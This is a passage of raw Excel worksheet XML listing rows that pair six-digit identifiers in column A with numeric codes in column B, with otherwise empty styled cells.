      <c r="H5739" s="1"/>
    </row>
    <row r="5740" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5740" s="5">
        <v>700148</v>
      </c>
      <c r="B5740" s="3">
        <v>901027</v>
      </c>
      <c r="D5740" s="5"/>
      <c r="E5740" s="3"/>
      <c r="F5740" s="1"/>
      <c r="H5740" s="1"/>
    </row>
    <row r="5741" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5741" s="5">
        <v>700148</v>
      </c>
      <c r="B5741" s="3">
        <v>901120</v>
      </c>
      <c r="D5741" s="5"/>
      <c r="E5741" s="3"/>
      <c r="F5741" s="1"/>
      <c r="H5741" s="1"/>
    </row>
    <row r="5742" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5742" s="5">
        <v>700148</v>
      </c>
      <c r="B5742" s="3">
        <v>901566.00100000005</v>
      </c>
      <c r="D5742" s="5"/>
      <c r="E5742" s="3"/>
      <c r="F5742" s="1"/>
      <c r="H5742" s="1"/>
    </row>
    <row r="5743" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5743" s="5">
        <v>700148</v>
      </c>
      <c r="B5743" s="3">
        <v>901057</v>
      </c>
      <c r="D5743" s="5"/>
      <c r="E5743" s="3"/>
      <c r="F5743" s="1"/>
      <c r="H5743" s="1"/>
    </row>
    <row r="5744" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5744" s="5">
        <v>700148</v>
      </c>
      <c r="B5744" s="3">
        <v>901219</v>
      </c>
      <c r="D5744" s="5"/>
      <c r="E5744" s="3"/>
      <c r="F5744" s="1"/>
      <c r="H5744" s="1"/>
    </row>
    <row r="5745" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5745" s="5">
        <v>700148</v>
      </c>
      <c r="B5745" s="3">
        <v>901053.005</v>
      </c>
      <c r="D5745" s="5"/>
      <c r="E5745" s="3"/>
      <c r="F5745" s="1"/>
      <c r="H5745" s="1"/>
    </row>
    <row r="5746" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5746" s="5">
        <v>700148</v>
      </c>
      <c r="B5746" s="3">
        <v>901113</v>
      </c>
      <c r="D5746" s="5"/>
      <c r="E5746" s="3"/>
      <c r="F5746" s="1"/>
      <c r="H5746" s="1"/>
    </row>
    <row r="5747" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5747" s="5">
        <v>700148</v>
      </c>
      <c r="B5747" s="3">
        <v>901218.01100000006</v>
      </c>
      <c r="D5747" s="5"/>
      <c r="E5747" s="3"/>
      <c r="F5747" s="1"/>
      <c r="H5747" s="1"/>
    </row>
    <row r="5748" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5748" s="5">
        <v>700148</v>
      </c>
      <c r="B5748" s="3">
        <v>901518</v>
      </c>
      <c r="D5748" s="5"/>
      <c r="E5748" s="3"/>
      <c r="F5748" s="1"/>
      <c r="H5748" s="1"/>
    </row>
    <row r="5749" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5749" s="5">
        <v>700148</v>
      </c>
      <c r="B5749" s="3">
        <v>901518.00100000005</v>
      </c>
      <c r="D5749" s="5"/>
      <c r="E5749" s="3"/>
      <c r="F5749" s="1"/>
      <c r="H5749" s="1"/>
    </row>
    <row r="5750" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5750" s="5">
        <v>700148</v>
      </c>
      <c r="B5750" s="3">
        <v>901553.00199999998</v>
      </c>
      <c r="D5750" s="5"/>
      <c r="E5750" s="3"/>
      <c r="F5750" s="1"/>
      <c r="H5750" s="1"/>
    </row>
    <row r="5751" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5751" s="5">
        <v>700148</v>
      </c>
      <c r="B5751" s="3">
        <v>901553.00399999996</v>
      </c>
      <c r="D5751" s="5"/>
      <c r="E5751" s="3"/>
      <c r="F5751" s="1"/>
      <c r="H5751" s="1"/>
    </row>
    <row r="5752" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5752" s="5">
        <v>700148</v>
      </c>
      <c r="B5752" s="3">
        <v>901082</v>
      </c>
      <c r="D5752" s="5"/>
      <c r="E5752" s="3"/>
      <c r="F5752" s="1"/>
      <c r="H5752" s="1"/>
    </row>
    <row r="5753" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5753" s="5">
        <v>700148</v>
      </c>
      <c r="B5753" s="3">
        <v>901033</v>
      </c>
      <c r="D5753" s="5"/>
      <c r="E5753" s="3"/>
      <c r="F5753" s="1"/>
      <c r="H5753" s="1"/>
    </row>
    <row r="5754" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5754" s="5">
        <v>700148</v>
      </c>
      <c r="B5754" s="3">
        <v>901124</v>
      </c>
      <c r="D5754" s="5"/>
      <c r="E5754" s="3"/>
      <c r="F5754" s="1"/>
      <c r="H5754" s="1"/>
    </row>
    <row r="5755" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5755" s="5">
        <v>700148</v>
      </c>
      <c r="B5755" s="3">
        <v>901204.00199999998</v>
      </c>
      <c r="D5755" s="5"/>
      <c r="E5755" s="3"/>
      <c r="F5755" s="1"/>
      <c r="H5755" s="1"/>
    </row>
    <row r="5756" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5756" s="5">
        <v>700148</v>
      </c>
      <c r="B5756" s="3">
        <v>901497</v>
      </c>
      <c r="D5756" s="5"/>
      <c r="E5756" s="3"/>
      <c r="F5756" s="1"/>
      <c r="H5756" s="1"/>
    </row>
    <row r="5757" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5757" s="5">
        <v>700148</v>
      </c>
      <c r="B5757" s="3">
        <v>901102.00100000005</v>
      </c>
      <c r="D5757" s="5"/>
      <c r="E5757" s="3"/>
      <c r="F5757" s="1"/>
      <c r="H5757" s="1"/>
    </row>
    <row r="5758" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5758" s="5">
        <v>700358</v>
      </c>
      <c r="B5758" s="3">
        <v>901087.00300000003</v>
      </c>
      <c r="D5758" s="5"/>
      <c r="E5758" s="3"/>
      <c r="F5758" s="1"/>
      <c r="H5758" s="1"/>
    </row>
    <row r="5759" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5759" s="5">
        <v>700358</v>
      </c>
      <c r="B5759" s="3">
        <v>901137.00300000003</v>
      </c>
      <c r="D5759" s="5"/>
      <c r="E5759" s="3"/>
      <c r="F5759" s="1"/>
      <c r="H5759" s="1"/>
    </row>
    <row r="5760" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5760" s="5">
        <v>700358</v>
      </c>
      <c r="B5760" s="3">
        <v>901137.00399999996</v>
      </c>
      <c r="D5760" s="5"/>
      <c r="E5760" s="3"/>
      <c r="F5760" s="1"/>
      <c r="H5760" s="1"/>
    </row>
    <row r="5761" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5761" s="5">
        <v>700358</v>
      </c>
      <c r="B5761" s="3">
        <v>901137.005</v>
      </c>
      <c r="D5761" s="5"/>
      <c r="E5761" s="3"/>
      <c r="F5761" s="1"/>
      <c r="H5761" s="1"/>
    </row>
    <row r="5762" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5762" s="5">
        <v>700313</v>
      </c>
      <c r="B5762" s="3">
        <v>901412</v>
      </c>
      <c r="D5762" s="5"/>
      <c r="E5762" s="3"/>
      <c r="F5762" s="1"/>
      <c r="H5762" s="1"/>
    </row>
    <row r="5763" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5763" s="5">
        <v>700313</v>
      </c>
      <c r="B5763" s="3">
        <v>901476</v>
      </c>
      <c r="D5763" s="5"/>
      <c r="E5763" s="3"/>
      <c r="F5763" s="1"/>
      <c r="H5763" s="1"/>
    </row>
    <row r="5764" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5764" s="5">
        <v>700313</v>
      </c>
      <c r="B5764" s="3">
        <v>901437</v>
      </c>
      <c r="D5764" s="5"/>
      <c r="E5764" s="3"/>
      <c r="F5764" s="1"/>
      <c r="H5764" s="1"/>
    </row>
    <row r="5765" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5765" s="5">
        <v>700313</v>
      </c>
      <c r="B5765" s="3">
        <v>901426</v>
      </c>
      <c r="D5765" s="5"/>
      <c r="E5765" s="3"/>
      <c r="F5765" s="1"/>
      <c r="H5765" s="1"/>
    </row>
    <row r="5766" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5766" s="5">
        <v>700313</v>
      </c>
      <c r="B5766" s="3">
        <v>901422</v>
      </c>
      <c r="D5766" s="5"/>
      <c r="E5766" s="3"/>
      <c r="F5766" s="1"/>
      <c r="H5766" s="1"/>
    </row>
    <row r="5767" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5767" s="5">
        <v>700253</v>
      </c>
      <c r="B5767" s="3">
        <v>901560</v>
      </c>
      <c r="D5767" s="5"/>
      <c r="E5767" s="3"/>
      <c r="F5767" s="1"/>
      <c r="H5767" s="1"/>
    </row>
    <row r="5768" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5768" s="5">
        <v>700253</v>
      </c>
      <c r="B5768" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D5768" s="5"/>
      <c r="E5768" s="3"/>
      <c r="F5768" s="1"/>
      <c r="H5768" s="1"/>
    </row>
    <row r="5769" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5769" s="5">
        <v>700253</v>
      </c>
      <c r="B5769" s="3">
        <v>901115</v>
      </c>
      <c r="D5769" s="5"/>
      <c r="E5769" s="3"/>
      <c r="F5769" s="1"/>
      <c r="H5769" s="1"/>
    </row>
    <row r="5770" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5770" s="5">
        <v>700253</v>
      </c>
      <c r="B5770" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D5770" s="5"/>
      <c r="E5770" s="3"/>
      <c r="F5770" s="1"/>
      <c r="H5770" s="1"/>
    </row>
    <row r="5771" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5771" s="5">
        <v>700253</v>
      </c>
      <c r="B5771" s="3">
        <v>901562.00100000005</v>
      </c>
      <c r="D5771" s="5"/>
      <c r="E5771" s="3"/>
      <c r="F5771" s="1"/>
      <c r="H5771" s="1"/>
    </row>
    <row r="5772" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5772" s="5">
        <v>700253</v>
      </c>
      <c r="B5772" s="3">
        <v>901070.00100000005</v>
      </c>
      <c r="D5772" s="5"/>
      <c r="E5772" s="3"/>
      <c r="F5772" s="1"/>
      <c r="H5772" s="1"/>
    </row>
    <row r="5773" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5773" s="5">
        <v>700253</v>
      </c>
      <c r="B5773" s="3">
        <v>901070.00399999996</v>
      </c>
      <c r="D5773" s="5"/>
      <c r="E5773" s="3"/>
      <c r="F5773" s="1"/>
      <c r="H5773" s="1"/>
    </row>
    <row r="5774" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5774" s="5">
        <v>700253</v>
      </c>
      <c r="B5774" s="3">
        <v>901056.00100000005</v>
      </c>
      <c r="D5774" s="5"/>
      <c r="E5774" s="3"/>
      <c r="F5774" s="1"/>
      <c r="H5774" s="1"/>
    </row>
    <row r="5775" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5775" s="5">
        <v>700253</v>
      </c>
      <c r="B5775" s="3">
        <v>901082</v>
      </c>
      <c r="D5775" s="5"/>
      <c r="E5775" s="3"/>
      <c r="F5775" s="1"/>
      <c r="H5775" s="1"/>
    </row>
    <row r="5776" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5776" s="5">
        <v>700446</v>
      </c>
      <c r="B5776" s="3">
        <v>901134</v>
      </c>
      <c r="D5776" s="5"/>
      <c r="E5776" s="3"/>
      <c r="F5776" s="1"/>
      <c r="H5776" s="1"/>
    </row>
    <row r="5777" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5777" s="5">
        <v>700446</v>
      </c>
      <c r="B5777" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D5777" s="5"/>
      <c r="E5777" s="3"/>
      <c r="F5777" s="1"/>
      <c r="H5777" s="1"/>
    </row>
    <row r="5778" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5778" s="5">
        <v>700446</v>
      </c>
      <c r="B5778" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D5778" s="5"/>
      <c r="E5778" s="3"/>
      <c r="F5778" s="1"/>
      <c r="H5778" s="1"/>
    </row>
    <row r="5779" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5779" s="5">
        <v>700446</v>
      </c>
      <c r="B5779" s="3">
        <v>901486</v>
      </c>
      <c r="D5779" s="5"/>
      <c r="E5779" s="3"/>
      <c r="F5779" s="1"/>
      <c r="H5779" s="1"/>
    </row>
    <row r="5780" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5780" s="5">
        <v>700446</v>
      </c>
      <c r="B5780" s="3">
        <v>901083</v>
      </c>
      <c r="D5780" s="5"/>
      <c r="E5780" s="3"/>
      <c r="F5780" s="1"/>
      <c r="H5780" s="1"/>
    </row>
    <row r="5781" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5781" s="5">
        <v>700446</v>
      </c>
      <c r="B5781" s="3">
        <v>901222.00100000005</v>
      </c>
      <c r="D5781" s="5"/>
      <c r="E5781" s="3"/>
      <c r="F5781" s="1"/>
      <c r="H5781" s="1"/>
    </row>
    <row r="5782" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5782" s="5">
        <v>700446</v>
      </c>
      <c r="B5782" s="3">
        <v>901562.00100000005</v>
      </c>
      <c r="D5782" s="5"/>
      <c r="E5782" s="3"/>
      <c r="F5782" s="1"/>
      <c r="H5782" s="1"/>
    </row>
    <row r="5783" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5783" s="5">
        <v>700446</v>
      </c>
      <c r="B5783" s="3">
        <v>901490</v>
      </c>
      <c r="D5783" s="5"/>
      <c r="E5783" s="3"/>
      <c r="F5783" s="1"/>
      <c r="H5783" s="1"/>
    </row>
    <row r="5784" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5784" s="5">
        <v>700446</v>
      </c>
      <c r="B5784" s="3">
        <v>901036</v>
      </c>
      <c r="D5784" s="5"/>
      <c r="E5784" s="3"/>
      <c r="F5784" s="1"/>
      <c r="H5784" s="1"/>
    </row>
    <row r="5785" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5785" s="5">
        <v>700446</v>
      </c>
      <c r="B5785" s="3">
        <v>901036.005</v>
      </c>
      <c r="D5785" s="5"/>
      <c r="E5785" s="3"/>
      <c r="F5785" s="1"/>
      <c r="H5785" s="1"/>
    </row>
    <row r="5786" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5786" s="5">
        <v>700446</v>
      </c>
      <c r="B5786" s="3">
        <v>901106</v>
      </c>
      <c r="D5786" s="5"/>
      <c r="E5786" s="3"/>
      <c r="F5786" s="1"/>
      <c r="H5786" s="1"/>
    </row>
    <row r="5787" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5787" s="5">
        <v>700446</v>
      </c>
      <c r="B5787" s="3">
        <v>901027</v>
      </c>
      <c r="D5787" s="5"/>
      <c r="E5787" s="3"/>
      <c r="F5787" s="1"/>
      <c r="H5787" s="1"/>
    </row>
    <row r="5788" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5788" s="5">
        <v>700446</v>
      </c>
      <c r="B5788" s="3">
        <v>901057</v>
      </c>
      <c r="D5788" s="5"/>
      <c r="E5788" s="3"/>
      <c r="F5788" s="1"/>
      <c r="H5788" s="1"/>
    </row>
    <row r="5789" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5789" s="5">
        <v>700446</v>
      </c>
      <c r="B5789" s="3">
        <v>901055</v>
      </c>
      <c r="D5789" s="5"/>
      <c r="E5789" s="3"/>
      <c r="F5789" s="1"/>
      <c r="H5789" s="1"/>
    </row>
    <row r="5790" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5790" s="5">
        <v>700446</v>
      </c>
      <c r="B5790" s="3">
        <v>901021.00199999998</v>
      </c>
      <c r="D5790" s="5"/>
      <c r="E5790" s="3"/>
      <c r="F5790" s="1"/>
      <c r="H5790" s="1"/>
    </row>
    <row r="5791" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5791" s="5">
        <v>700446</v>
      </c>
      <c r="B5791" s="3">
        <v>901053.005</v>
      </c>
      <c r="D5791" s="5"/>
      <c r="E5791" s="3"/>
      <c r="F5791" s="1"/>
      <c r="H5791" s="1"/>
    </row>
    <row r="5792" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5792" s="5">
        <v>700446</v>
      </c>
      <c r="B5792" s="3">
        <v>901489</v>
      </c>
      <c r="D5792" s="5"/>
      <c r="E5792" s="3"/>
      <c r="F5792" s="1"/>
      <c r="H5792" s="1"/>
    </row>
    <row r="5793" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5793" s="5">
        <v>700446</v>
      </c>
      <c r="B5793" s="3">
        <v>901614.00100000005</v>
      </c>
      <c r="D5793" s="5"/>
      <c r="E5793" s="3"/>
      <c r="F5793" s="1"/>
      <c r="H5793" s="1"/>
    </row>
    <row r="5794" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5794" s="5">
        <v>700446</v>
      </c>
      <c r="B5794" s="3">
        <v>901016</v>
      </c>
      <c r="D5794" s="5"/>
      <c r="E5794" s="3"/>
      <c r="F5794" s="1"/>
      <c r="H5794" s="1"/>
    </row>
    <row r="5795" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5795" s="5">
        <v>700446</v>
      </c>
      <c r="B5795" s="3">
        <v>901205</v>
      </c>
      <c r="D5795" s="5"/>
      <c r="E5795" s="3"/>
      <c r="F5795" s="1"/>
      <c r="H5795" s="1"/>
    </row>
    <row r="5796" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5796" s="5">
        <v>700446</v>
      </c>
      <c r="B5796" s="3">
        <v>901078.00199999998</v>
      </c>
      <c r="D5796" s="5"/>
      <c r="E5796" s="3"/>
      <c r="F5796" s="1"/>
      <c r="H5796" s="1"/>
    </row>
    <row r="5797" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5797" s="5">
        <v>700085</v>
      </c>
      <c r="B5797" s="3">
        <v>901087.00100000005</v>
      </c>
      <c r="D5797" s="5"/>
      <c r="E5797" s="3"/>
      <c r="F5797" s="1"/>
      <c r="H5797" s="1"/>
    </row>
    <row r="5798" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5798" s="5">
        <v>700085</v>
      </c>
      <c r="B5798" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D5798" s="5"/>
      <c r="E5798" s="3"/>
      <c r="F5798" s="1"/>
      <c r="H5798" s="1"/>
    </row>
    <row r="5799" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5799" s="5">
        <v>700085</v>
      </c>
      <c r="B5799" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D5799" s="5"/>
      <c r="E5799" s="3"/>
      <c r="F5799" s="1"/>
      <c r="H5799" s="1"/>
    </row>
    <row r="5800" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5800" s="5">
        <v>700085</v>
      </c>
      <c r="B5800" s="3">
        <v>901547.00899999996</v>
      </c>
      <c r="D5800" s="5"/>
      <c r="E5800" s="3"/>
      <c r="F5800" s="1"/>
      <c r="H5800" s="1"/>
    </row>
    <row r="5801" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5801" s="5">
        <v>700085</v>
      </c>
      <c r="B5801" s="3">
        <v>901136.00100000005</v>
      </c>
      <c r="D5801" s="5"/>
      <c r="E5801" s="3"/>
      <c r="F5801" s="1"/>
      <c r="H5801" s="1"/>
    </row>
    <row r="5802" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5802" s="5">
        <v>700085</v>
      </c>
      <c r="B5802" s="3">
        <v>901132.00100000005</v>
      </c>
      <c r="D5802" s="5"/>
      <c r="E5802" s="3"/>
      <c r="F5802" s="1"/>
      <c r="H5802" s="1"/>
    </row>
    <row r="5803" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5803" s="5">
        <v>700085</v>
      </c>
      <c r="B5803" s="3">
        <v>901008</v>
      </c>
      <c r="D5803" s="5"/>
      <c r="E5803" s="3"/>
      <c r="F5803" s="1"/>
      <c r="H5803" s="1"/>
    </row>
    <row r="5804" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5804" s="5">
        <v>700085</v>
      </c>
      <c r="B5804" s="3">
        <v>901036.005</v>
      </c>
      <c r="D5804" s="5"/>
      <c r="E5804" s="3"/>
      <c r="F5804" s="1"/>
      <c r="H5804" s="1"/>
    </row>
    <row r="5805" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5805" s="5">
        <v>700085</v>
      </c>
      <c r="B5805" s="3">
        <v>901082</v>
      </c>
      <c r="D5805" s="5"/>
      <c r="E5805" s="3"/>
      <c r="F5805" s="1"/>
      <c r="H5805" s="1"/>
    </row>
    <row r="5806" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5806" s="5">
        <v>700085</v>
      </c>
      <c r="B5806" s="3">
        <v>901007</v>
      </c>
      <c r="D5806" s="5"/>
      <c r="E5806" s="3"/>
      <c r="F5806" s="1"/>
      <c r="H5806" s="1"/>
    </row>
    <row r="5807" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5807" s="5">
        <v>700074</v>
      </c>
      <c r="B5807" s="3">
        <v>901548.00199999998</v>
      </c>
      <c r="D5807" s="5"/>
      <c r="E5807" s="3"/>
      <c r="F5807" s="1"/>
      <c r="H5807" s="1"/>
    </row>
    <row r="5808" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5808" s="5">
        <v>700074</v>
      </c>
      <c r="B5808" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D5808" s="5"/>
      <c r="E5808" s="3"/>
      <c r="F5808" s="1"/>
      <c r="H5808" s="1"/>
    </row>
    <row r="5809" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5809" s="5">
        <v>700074</v>
      </c>
      <c r="B5809" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D5809" s="5"/>
      <c r="E5809" s="3"/>
      <c r="F5809" s="1"/>
      <c r="H5809" s="1"/>
    </row>
    <row r="5810" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5810" s="5">
        <v>700074</v>
      </c>
      <c r="B5810" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D5810" s="5"/>
      <c r="E5810" s="3"/>
      <c r="F5810" s="1"/>
      <c r="H5810" s="1"/>
    </row>
    <row r="5811" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5811" s="5">
        <v>700074</v>
      </c>
      <c r="B5811" s="3">
        <v>901543.00300000003</v>
      </c>
      <c r="D5811" s="5"/>
      <c r="E5811" s="3"/>
      <c r="F5811" s="1"/>
      <c r="H5811" s="1"/>
    </row>
    <row r="5812" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5812" s="5">
        <v>700074</v>
      </c>
      <c r="B5812" s="3">
        <v>901573.00100000005</v>
      </c>
      <c r="D5812" s="5"/>
      <c r="E5812" s="3"/>
      <c r="F5812" s="1"/>
      <c r="H5812" s="1"/>
    </row>
    <row r="5813" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5813" s="5">
        <v>700074</v>
      </c>
      <c r="B5813" s="3">
        <v>901574.00199999998</v>
      </c>
      <c r="D5813" s="5"/>
      <c r="E5813" s="3"/>
      <c r="F5813" s="1"/>
      <c r="H5813" s="1"/>
    </row>
    <row r="5814" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5814" s="5">
        <v>700074</v>
      </c>
      <c r="B5814" s="3">
        <v>901070.00399999996</v>
      </c>
      <c r="D5814" s="5"/>
      <c r="E5814" s="3"/>
      <c r="F5814" s="1"/>
      <c r="H5814" s="1"/>
    </row>
    <row r="5815" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5815" s="5">
        <v>700074</v>
      </c>
      <c r="B5815" s="3">
        <v>901105</v>
      </c>
      <c r="D5815" s="5"/>
      <c r="E5815" s="3"/>
      <c r="F5815" s="1"/>
      <c r="H5815" s="1"/>
    </row>
    <row r="5816" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5816" s="5">
        <v>700074</v>
      </c>
      <c r="B5816" s="3">
        <v>901027</v>
      </c>
      <c r="D5816" s="5"/>
      <c r="E5816" s="3"/>
      <c r="F5816" s="1"/>
      <c r="H5816" s="1"/>
    </row>
    <row r="5817" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5817" s="5">
        <v>700074</v>
      </c>
      <c r="B5817" s="3">
        <v>901218.01100000006</v>
      </c>
      <c r="D5817" s="5"/>
      <c r="E5817" s="3"/>
      <c r="F5817" s="1"/>
      <c r="H5817" s="1"/>
    </row>
    <row r="5818" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5818" s="5">
        <v>700370</v>
      </c>
      <c r="B5818" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D5818" s="5"/>
      <c r="E5818" s="3"/>
      <c r="F5818" s="1"/>
      <c r="H5818" s="1"/>
    </row>
    <row r="5819" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5819" s="5">
        <v>700370</v>
      </c>
      <c r="B5819" s="3">
        <v>901486</v>
      </c>
      <c r="D5819" s="5"/>
      <c r="E5819" s="3"/>
      <c r="F5819" s="1"/>
      <c r="H5819" s="1"/>
    </row>
    <row r="5820" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5820" s="5">
        <v>700370</v>
      </c>
      <c r="B5820" s="3">
        <v>901070.00399999996</v>
      </c>
      <c r="D5820" s="5"/>
      <c r="E5820" s="3"/>
      <c r="F5820" s="1"/>
      <c r="H5820" s="1"/>
    </row>
    <row r="5821" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5821" s="5">
        <v>700370</v>
      </c>
      <c r="B5821" s="3">
        <v>901027</v>
      </c>
      <c r="D5821" s="5"/>
      <c r="E5821" s="3"/>
      <c r="F5821" s="1"/>
      <c r="H5821" s="1"/>
    </row>
    <row r="5822" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5822" s="5">
        <v>700370</v>
      </c>
      <c r="B5822" s="3">
        <v>901027.00100000005</v>
      </c>
      <c r="D5822" s="5"/>
      <c r="E5822" s="3"/>
      <c r="F5822" s="1"/>
      <c r="H5822" s="1"/>
    </row>
    <row r="5823" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5823" s="5">
        <v>700111</v>
      </c>
      <c r="B5823" s="3">
        <v>901053.005</v>
      </c>
      <c r="D5823" s="5"/>
      <c r="E5823" s="3"/>
      <c r="F5823" s="1"/>
      <c r="H5823" s="1"/>
    </row>
    <row r="5824" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5824" s="5">
        <v>700461</v>
      </c>
      <c r="B5824" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D5824" s="5"/>
      <c r="E5824" s="3"/>
      <c r="F5824" s="1"/>
      <c r="H5824" s="1"/>
    </row>
    <row r="5825" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5825" s="5">
        <v>700461</v>
      </c>
      <c r="B5825" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D5825" s="5"/>
      <c r="E5825" s="3"/>
      <c r="F5825" s="1"/>
      <c r="H5825" s="1"/>
    </row>
    <row r="5826" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5826" s="5">
        <v>700461</v>
      </c>
      <c r="B5826" s="3">
        <v>901005</v>
      </c>
      <c r="D5826" s="5"/>
      <c r="E5826" s="3"/>
      <c r="F5826" s="1"/>
      <c r="H5826" s="1"/>
    </row>
    <row r="5827" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5827" s="5">
        <v>700461</v>
      </c>
      <c r="B5827" s="3">
        <v>901140</v>
      </c>
      <c r="D5827" s="5"/>
      <c r="E5827" s="3"/>
      <c r="F5827" s="1"/>
      <c r="H5827" s="1"/>
    </row>
    <row r="5828" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5828" s="5">
        <v>700461</v>
      </c>
      <c r="B5828" s="3">
        <v>901546.01100000006</v>
      </c>
      <c r="D5828" s="5"/>
      <c r="E5828" s="3"/>
      <c r="F5828" s="1"/>
      <c r="H5828" s="1"/>
    </row>
    <row r="5829" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5829" s="5">
        <v>700461</v>
      </c>
      <c r="B5829" s="3">
        <v>901546.01199999999</v>
      </c>
      <c r="D5829" s="5"/>
      <c r="E5829" s="3"/>
      <c r="F5829" s="1"/>
      <c r="H5829" s="1"/>
    </row>
    <row r="5830" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5830" s="5">
        <v>700461</v>
      </c>
      <c r="B5830" s="3">
        <v>901083</v>
      </c>
      <c r="D5830" s="5"/>
      <c r="E5830" s="3"/>
      <c r="F5830" s="1"/>
      <c r="H5830" s="1"/>
    </row>
    <row r="5831" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5831" s="5">
        <v>700461</v>
      </c>
      <c r="B5831" s="3">
        <v>901070</v>
      </c>
      <c r="D5831" s="5"/>
      <c r="E5831" s="3"/>
      <c r="F5831" s="1"/>
      <c r="H5831" s="1"/>
    </row>
    <row r="5832" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5832" s="5">
        <v>700461</v>
      </c>
      <c r="B5832" s="3">
        <v>901070.00399999996</v>
      </c>
      <c r="D5832" s="5"/>
      <c r="E5832" s="3"/>
      <c r="F5832" s="1"/>
      <c r="H5832" s="1"/>
    </row>
    <row r="5833" spans="1:8" x14ac:dyDescent="0.25">
